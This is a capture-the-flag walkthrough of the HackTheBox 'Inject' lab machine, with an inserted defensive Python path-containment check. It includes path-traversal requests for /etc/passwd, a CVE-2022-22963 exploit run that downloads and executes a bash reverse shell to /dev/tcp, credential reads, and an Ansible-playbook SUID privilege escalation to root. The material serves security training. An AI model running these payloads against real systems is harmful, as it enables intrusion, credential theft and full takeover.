HackTheBox Inject Writeup
Explore the fundamentals of cybersecurity in the Inject Capture The Flag (CTF) challenge, an easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
10.10.11.204 inject.htb
Script to add hosts automatically
ip="10.10.11.204"
domain="inject.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV inject.htb
Nmap scan report for inject.htb (10.10.11.204)
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ca:f1:0c:51:5a:59:62:77:f0:a8:0c:5c:7c:8d:da:f8 (RSA)
| 256 d5:1c:81:c9:7b:07:6b:1c:c1:b4:29:25:4b:52:21:9f (ECDSA)
|_ 256 db:1d:8c:eb:94:72:b0:d3:ed:44:b9:6c:93:a7:f9:1d (ED25519)
8080/tcp open nagios-nsca Nagios NSCA
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
http://10.10.11.204:8080/upload
LFI
curl -s 'http://10.10.11.204:8080/show_image?img=../../../../../../etc/passwd' | grep sh$
curl -s 'http://10.10.11.204:8080/show_image?img=pwn' | jq
Output
{
"timestamp": "2024-12-05T05:22:30.253+00:00",
"status": 500,
"error": "Internal Server Error",
"message": "URL [file:/var/www/WebApp/src/main/uploads/pwn] cannot be resolved in the file system for checking its content length",
"path": "/show_image"
}
curl -s 'http://10.10.11.204:8080/show_image?img=../../../pom.xml'
Using the full path revealed by the error message:
curl -s 'http://10.10.11.204:8080/show_image?img=../../../../../../../../../var/www/WebApp/pom.xml' > pom.xml
snyk test --file=pom.xml
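As an added defensive note, not part of the original writeup or of the target application's code, the following Python function shows the containment check the show_image handler lacked: it resolves the requested name against the uploads directory reported in the error message above and rejects anything that escapes it. The base directory comes from the page; the function name and logic are my own.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Base directory taken from the error message returned for img=pwn above.
UPLOADS_DIR = "/var/www/WebApp/src/main/uploads"


def resolve_upload(img: str, base: str = UPLOADS_DIR) -> Optional[str]:
    """Return the absolute path for `img` if it stays inside `base`, else None.

    Purely lexical (no filesystem access) so it runs offline; a real handler
    would also pass the result through os.path.realpath() to defeat symlinks.
    """
    if not img or "\x00" in img:
        return None
    # Decode once, as the servlet container would, so encoded dots and
    # slashes such as %2e%2e%2f are judged in their decoded form.
    name = unquote(img)
    base = os.path.normpath(base)
    # os.path.join discards `base` when `name` is absolute, and normpath
    # collapses the '..' segments; both cases are caught by the containment
    # test below rather than by ad-hoc string filtering of "../".
    candidate = os.path.normpath(os.path.join(base, name))
    if candidate == base:
        return None  # the directory itself, not a file inside it
    # commonpath compares whole path components, so a sibling directory
    # such as ".../uploads2" is not mistaken for a child of ".../uploads".
    return candidate if os.path.commonpath([base, candidate]) == base else None
```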
CVE-2022-22963
Output
✗ Remote Code Execution [Critical Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKCLOUD-2436645] in org.springframework.cloud:spring-cloud-function-context@3.2.2
introduced by org.springframework.cloud:spring-cloud-function-web@3.2.2 > org.springframework.cloud:spring-cloud-function-context@3.2.2
https://www.exploit-db.com/exploits/51577
wget https://www.exploit-db.com/raw/51577 -O poc
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo -e '/bin/bash -i >& /dev/tcp/'$vpnip'/9001 0>&1' > rev.sh
python -m http.server
Listener
nc -lvnp 9001
python poc --url 'http://10.10.11.204:8080/functionRouter' --command 'curl http://10.10.14.18:8000/rev.sh -o /tmp/rev.sh'
python poc --url 'http://10.10.11.204:8080/functionRouter' --command 'bash /tmp/rev.sh'
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm;
cat /home/frank/.m2/settings.xml
su phil
cat /home/phil/user.txt
Although I rarely mention using pspy on Linux, it’s essential to deploy it regularly—similar to linpeas on Linux or BloodHound on Windows—particularly when you’re stuck.
curl -s http://10.10.14.18:8000/pspy64 -o ps
chmod +x ps
./ps
After running it, the output shows a recurring Ansible job:
/usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
/usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
Because the playbooks in /opt/automation/tasks/ are executed with root privileges, we create our own playbook there:
cd /opt/automation/tasks/
cat playbook_1.yml
nano shell.yml
- hosts: localhost
  tasks:
    - name: Set SUID bit on /bin/bash
      ansible.builtin.shell:
        cmd: "/usr/bin/chmod +s /bin/bash"
Now we watch the permissions of /bin/bash and wait:
watch -n 1 'ls -la /bin/bash'
-rwxr-xr-x 1 root root 1183448 Apr 18 2022 /bin/bash
Once the job runs our playbook, the SUID bit appears:
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
bash -p
cat /root/root.txt